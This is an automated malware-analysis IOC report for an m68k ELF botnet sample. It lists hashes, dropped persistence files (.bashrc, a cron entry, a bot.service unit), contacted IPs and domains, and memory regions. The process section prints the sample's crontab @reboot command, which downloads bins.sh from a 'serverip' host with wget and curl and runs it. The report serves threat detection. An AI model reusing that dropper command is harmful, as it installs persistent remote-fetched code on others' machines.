Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

m68k.elf

ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Entropy:	6.278250752108479
Filename:	m68k.elf
Filesize:	81348
MD5:	d7eaa2bceba9d7e0d2aa38e1ce1a3649
SHA1:	77ca39cd70efba9684b254b9397881c8fb85b71d
SHA256:	e5cc8bce6857e01c4c2ccc7ca4cfb47a5578c6a2b940be2e99c122589390fdc1
SHA512:	150c66f98971175c7ef3d45e12586dcb84941a9d349ce3593ef587e449b9d9afd8ce6ffd69c9e0fe74931a9b015189814793b99a4bc8b758a4618c7b56cb6ad5
SSDEEP:	1536:7r9VBgyqw9wgPpTW0HCrBvY8rxXzztzHGpzs3mX3Ftq5ixE:7r9VBdqsPsiCrBv9LzHszsWu+E
Preview:	.ELF.......................D...4..;......4. ...(......................T..T...... .......T..JT..JT......f....... .dt.Q............................NV..a....da.....N^NuNV..J9..M.f>"y..Jl QJ.g.X.#...JlN."y..Jl QJ.f.A.....J.g.Hy..PN.X.......M.N^NuNV..N^NuN

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading
Sample listens on a socket	Networking
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion	Security Software Discovery

/root/.bashrc

ASCII text

dropped

Details

File:	/root/.bashrc
Category:	dropped
Dump:	.bashrc.13.dr
ID:	dr_0
Target ID:	13
Process:	/tmp/m68k.elf
Type:	ASCII text
Entropy:	4.358630015292201
Encrypted:	false
Ssdeep:	3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
Size:	178
Whitelisted:	false
Reputation:	moderate

Signature Hits	Behavior Group	Mitre Attack
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories

/var/spool/cron/crontabs/tmp.aHD8f7

ASCII text

dropped

Details

File:	/var/spool/cron/crontabs/tmp.aHD8f7
Category:	dropped
Dump:	tmp.aHD8f7.22.dr
ID:	dr_2
Target ID:	22
Process:	/usr/bin/crontab
Type:	ASCII text
Entropy:	5.1026069467163655
Encrypted:	false
Ssdeep:	6:SUrpqoqQjEOP1KmREJOBFQLvaNFXqZHGMQ5UYLtCFt3HY8jsHB:8QjHig8mXeeHLUHY8mB
Size:	235
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior

/memfd:snapd-env-generator (deleted)

ASCII text

dropped

Details

File:	/memfd:snapd-env-generator (deleted)
Category:	dropped
Dump:	memfd_snapd-env-generator (deleted).38.dr
ID:	dr_3
Target ID:	38
Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Type:	ASCII text
Entropy:	3.7627880354948586
Encrypted:	false
Ssdeep:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
Size:	76
Whitelisted:	false
Reputation:	moderate

/usr/lib/systemd/system/bot.service

ASCII text

dropped

Details

File:	/usr/lib/systemd/system/bot.service
Category:	dropped
Dump:	bot.service.13.dr
ID:	dr_1
Target ID:	13
Process:	/tmp/m68k.elf
Type:	ASCII text
Entropy:	4.9110117370593995
Encrypted:	false
Ssdeep:	6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
Size:	356
Whitelisted:	false
Reputation:	moderate

Processes

Path

Cmdline

Malicious

/tmp/m68k.elf

/bin/sh

sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"

/bin/sh

/usr/bin/crontab

crontab -l

/bin/sh

/usr/bin/chmod

chmod +x bins.sh

/bin/sh

/usr/bin/sh

sh bins.sh

/bin/sh

/bin/curl

/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh

/bin/sh

/usr/bin/chmod

chmod +x bins.sh

/usr/bin/sh

sh bins.sh

/bin/sh

/usr/bin/crontab

crontab -

/tmp/m68k.elf

/bin/sh

sh -c "/bin/systemctl enable bot"

/bin/sh

/bin/systemctl

/bin/systemctl enable bot

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb

There are 21 hidden processes, click here to show them.

URLs

Name

Malicious

http://serverip/bins/bins.sh

unknown

Details

Name:	http://serverip/bins/bins.sh
TargetID:	22
From Memory:	true
Current Path:	/usr/bin/crontab
Source:	tmp.aHD8f7.22.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

http://serverip/bins/bins.sh;

unknown

Details

Name:	http://serverip/bins/bins.sh;
TargetID:	13
From Memory:	true
Current Path:	/tmp/m68k.elf
Source:	bot.service.13.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

Domains

Name

Malicious

cdn.fwupd.org

unknown

host.zopz-api.com

unknown

IPs

Domain

Country

Malicious

34.249.145.219

unknown

United States

Details

IP:	34.249.145.219
TargetID:	-1
Country:	United States
Countrycode:	USA
ASN number:	16509
ASN name:	AMAZON-02US
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

109.202.202.202

unknown

Switzerland

Details

IP:	109.202.202.202
TargetID:	-1
Country:	Switzerland
Countrycode:	CHE
ASN number:	13030
ASN name:	INIT7CH
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.43

unknown

United Kingdom

Details

IP:	91.189.91.43
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.42

unknown

United Kingdom

Details

IP:	91.189.91.42
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

7f70acf0e000

page read and write

7f70acd98000

page read and write

7f70abbc6000

page read and write

55c185030000

page read and write

7f70aca28000

page read and write

55c182f93000

page read and write

7f7024020000

page read and write

7f70a4000000

page read and write

7f70acd98000

page read and write

7f70acf0e000

page read and write

7f70a4000000

page read and write

7f7024016000

page read and write

7f70aca4d000

page read and write

7f70ac3d7000

page read and write

7f70acec9000

page read and write

55c1868df000

page read and write

55c184f99000

page execute and read and write

7ffc52a77000

page read and write

7f7024016000

page read and write

7f702401e000

page read and write

7f70ac3c9000

page read and write

55c184f99000

page execute and read and write

7f70ac3c9000

page read and write

7f702401e000

page read and write

7f70acec1000

page read and write

55c182f9b000

page read and write

7f7024014000

page execute read

7f70aca4d000

page read and write

7f70aca28000

page read and write

7f70acec1000

page read and write

55c185030000

page read and write

7f70ac666000

page read and write

7f70ac666000

page read and write

7f7024014000

page execute read

7f70a4021000

page read and write

55c182d61000

page execute read

55c182f9b000

page read and write

7ffc52ac4000

page execute read

7f70abbc6000

page read and write

55c182d61000

page execute read

7ffc52ac4000

page execute read

7ffc52a77000

page read and write

7f70acec9000

page read and write

55c182f93000

page read and write

7f70ac3d7000

page read and write

7f70a4021000

page read and write

55c1868df000

page read and write

There are 37 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
m68k.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportm68k.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
m68k.elf